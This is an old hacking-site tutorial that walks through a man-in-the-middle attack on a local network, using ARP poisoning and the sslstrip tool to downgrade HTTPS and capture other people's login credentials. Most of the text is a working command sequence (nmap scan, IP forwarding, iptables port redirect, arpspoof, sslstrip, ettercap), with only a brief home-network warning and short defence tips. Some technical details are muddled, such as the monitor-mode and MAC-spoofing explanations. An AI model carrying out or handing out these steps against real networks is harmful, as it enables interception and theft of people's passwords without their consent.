How to Defeat SSL in Practice with SSL Strip

Oct 6, 2011 09:58 PM

SSL stands for Secure Socket Layer. It's an encryption standard used on most sites' login pages to avoid their users' passwords being packet sniffed in simple plain-text format. This keeps the users safe by having all of that traffic encrypted over an "https" connection. So, whenever you see "https://" in front of the URL in your browser, you know you're safe... or are you?

In this Null Byte, I'm going to show you how to perform a MITM (Man-In-The-Middle) attack on someone via ARP poisoning. ARP poisoning is a technique used to trick a client into thinking that your computer is the router, and to forward all their traffic to you. This allows you to sniff out all the traffic before sending it to the actual router.

After that, we are going to strip the SSL layer as well, so you can intercept any login, even logins "protected" by SSL. There is a new tool out called BEAST, which decrypts SSL/TLS via an encryption flaw. However, we will be using Moxie Marlinspike's SSL Strip which removes the SSL layer, but makes the connection appear to be normal.

How SSL Strip Works

An attacker picks a target to attack. After, they spoof themselves to appear as the wireless access point by making their Media Access Control (MAC) address identical to the router's. While they appear to be the router, they send packets to the client/target requesting their packets, thus creating a MITM topology.

The client then forwards requests to the attacker, and the attacker takes the requests and retrieves them from the server for the client. After they recieve it, the SSL layer gets stripped and the page is sent to the target. The victim then forwards their packets to the attacker unknowingly, while their private information is picked out of it. SSL Strip puts the SSL layer back on, fills it out, and sends it to the server. Everything looks fine to the server and client, except the attacker gets the information they desire.

This is going to be done using Linux, because Windows does not have wireless drivers capable of going into monitor mode. I suggest trying this on yourself on a home network, with two laptops and your friends.

Warnings

  • Don't perform this on people in public, this is a proof of concept to show you why SSL is still vulnerable, and how you can protect yourself using a guide I published previously. Do this on your home network, or you will get caught.

Tools Needed for SSL Strip

The following tools can be found in any package repository:

  • dsniff
  • sslstrip

  • iptables

  • python

  • python-twisted

  • ettercap

  • wireshark

In Arch Linux, I do this command in a terminal to download and install them (Ubuntu users, replace "pacman -S" with apt-get install"):

sudo pacman -S dsniff iptables python2 python-twisted ettercap wireshark

Now, download SSL Strip from Moxie, while following the install instructions on his page.

Sniffing Traffic (Non-HTTPS)

Get your wireless card into monitor mode, so you're capable of sniffing traffic.

sudo ifconfig wlan0 down && sudo ifconfig wlan0 mode monitor && sudo ifconfig wlan0 up

Now, run wireshark in a terminal to capture airborne packets.

sudo wireshark

Look in the packet information for usernames and passwords in hexadecimal conversion.

Sniffing Traffic (Using HTTPS)

When these commands are entered in the terminal, you need to leave them running, so open a new tab or terminal for each running command.

First we need to scan the local network for our target IP. This means we are pinging everyone on the local network and when we get replies, we can see their IP and pick them as a target.

  sudo nmap -sP 192.168.1.0/24

Make sure to paste your test computer's IP somewhere, maybe in a text document so that you can paste in the commands later.

Next, we need to enable IP forwarding: (This allows you to forward traffic to/from a client, port and interface that you specify.)

    sudo echo 1 > /proc/sys/net/ipv4/ip_forward 

Now we need to set up our interception. This tells your iptables that you want to pre-route your incoming port 80 traffic (HTTP) to 1024, because this is where you will be sniffing your traffic from.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1024

It's time to ARP poison your second computer to make it send traffic to you.

sudo arpspoof -i [interface] -t [router ip, target ip]

Next we strip the SSL layer off our target, taking the encrypted layer off to be forwarded to our victim (it even puts the favicon back on so it looks like it's still HTTPS!). Change directories to wherever you saved SSL Strip before typing this.

python sslstrip.py -l 1024

Finally, set up ettercap to capture traffic between you and the client.

sudo ettercap -Tq -i [interface]

Now, go log in to an SSL page, or tell your friend to log in to one, and you will get their traffic. It's simple, and most of this could be tossed into a script for fast attacking.

How Can I Defend Myself?

  • Don't use Wi-Fi you don't trust
  • Tunnel your traffic back home, if you must use public Wi-Fi. You can find a good guide, written by me for Windows, and Linux.
  • Don't access sensitive sites on-the-go!

Jump in the IRC channel by following this tutorial to ask me and other members questions, one-on-one!

Image by clshack

Just updated your iPhone? You'll find new Apple Intelligence capabilities, sudoku puzzles, Camera Control enhancements, volume control limits, layered Voice Memo recordings, and other useful features. Find out what's new and changed on your iPhone with the iOS 18.2 update.

Comments

No Comments Exist

Be the first, drop a comment!